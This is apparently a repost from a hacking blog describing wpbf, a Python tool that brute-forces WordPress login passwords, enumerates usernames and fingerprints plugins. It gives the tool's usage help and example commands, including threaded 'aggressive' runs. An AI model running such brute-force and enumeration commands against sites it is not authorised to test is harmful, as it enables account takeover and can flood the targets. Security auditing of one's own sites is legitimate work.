wpbf - WordPress Brute Force Tool

wpbf is a Python-based bruteforce tool for remotely testing password strength, username enumeration and plugin detection on a WordPress site.

How It Works

The script will try to login to the WordPress dashboard through the login form using a mixture of enumerated usernames, a wordlist and relevant keywords from the blog's content. If a single username is given, the script will not search for additional usernames.

When a correct username/password is found, it will be logged and shown in the standard output.

For faster results, you can spawn threads but BE CAREFUL not to flood/DoS the site. Default settings can be changed in "config.py" and "logging.conf" files.

The wordlist must have one entry per line, a small wordlist (wordlist.txt) and plugin list (plugins.txt) are provided for testing purposes.

Note: It requires Python 2.6+.

Features:

• Username enumeration and detection (TALSOFT-2011-0526, Author's archive page, and content parsing)
• Threads
• Use keywords from blog's content in the wordlist
• HTTP Proxy Support
• Basic WordPress fingerprint (version and full path)
• Advance plugins fingerprint (bruteforce, discovery and version/documentation)
• Detection of Login LockDown plugin (this plugin makes the bruteforce useless)
• Advanced logging using Python's logging library and logging configuration file

Usage:

  wpbf.py [-h] [-w WORDLIST] [-u USERNAME] [-s SCRIPTPATH] [-t THREADS] [-p PROXY] 
[-nk] [-eu] url

wpbf will audit and bruteforce your WordPress installation to test password
strength, server configuration, users and installed plugins. It Currently
supports threads and HTTP proxy and provides a very small default wordlist (a
dynamic wordlist is generated by default from the blog's content) and basic
username detection.

positional arguments:
  url                   base URL where WordPress is installed

optional arguments:
  -h, --help            show this help message and exit
  -w WORDLIST, --wordlist WORDLIST
                        worldlist file (default: wordlist.txt)
  -nk, --nokeywords     don't search keywords in content and add them to the
                        wordlist
  -u USERNAME, --username USERNAME
                        username (default: None)
  -s SCRIPTPATH, --scriptpath SCRIPTPATH
                        path to the login form (default: wp-login.php)
  -t THREADS, --threads THREADS
                        how many threads the script will spawn (default: 5)
  -p PROXY, --proxy PROXY
                        http proxy (ex: http://localhost:8008/)
  -nf, --nofingerprint  don't fingerprint WordPress
  -eu, --enumerateusers
                        only enumerate users (withouth bruteforcing)
  -mu MAXUSERS, --maxusers MAXUSERS
                        maximum number of usernames to enumerate (default: no
                        limit)
  -eut ENUMERATETOLERANCE, --enumeratetolerance ENUMERATETOLERANCE
                        user ID gap tolerance to use in username enumeration
                        (default: 3)
  -nps, --nopluginscan  skip plugin bruteforce, enumeration and fingerprint
  -ds, --dontstop       don't stop when password is found, continue with all
                        pending tasks
  --test                run python doctests (you can use a dummy URL here)

Examples:

• Basic

It will use the default settings (you can change the default settings in config.py file):

  $ ./wpbf.py http://ift.tt/1ltkwWC  

• Custom

Using username 'john', not using keywords in the wordlist and through a local proxy:

  $ ./wpbf.py --nokeywords -u john -p http://localhost:8008/ http://ift.tt/1ltkwWC  

• Aggressive

It will use default settings and spawn 23 threads:

  $ ./wpbf.py -t 23 http://ift.tt/1ltkwWC  

• Username enumeration

Only perform a user enumeration:

  $ ./wpbf.py -eu http://ift.tt/1ltkwWC  

Download wpbf

You might also like:

• Unlock Android Phone or Tablet
• The Hacker Wars (Documentary Film)
• Penetrate Pro: Android App For Hackers
• How To Setup DVWA Using XAMPP (Windows Tutorial)
• Intercepter-NG - Android App For Hackers
• Top Hacking Forums
• Detekt - Tool To Resist Surveillance
• ProxyDroid - Android App For Hackers
• Packet Sender - Free UDP and TCP Network Test Utility (Android App)
• Nipper - Android App For Hackers
• Passera - Android App For Hackers
• RouterCheck - Tool For Protecting Your Router (Android App)
• Fing - Network Tools (Android App)
• MoboClean - Android App For Hackers
• 5 Smart Ways To Protect Your Computer From Keyloggers
• SSHDroid - Android App For Hackers
• Resource Hacker - Windows Tool For Hackers
• zANTI - Android App For Hackers
• How To Monitor Your Computer For Free
• How To Turn Your Android Smartphone Into a Super Spy

from Effect Hacking full article here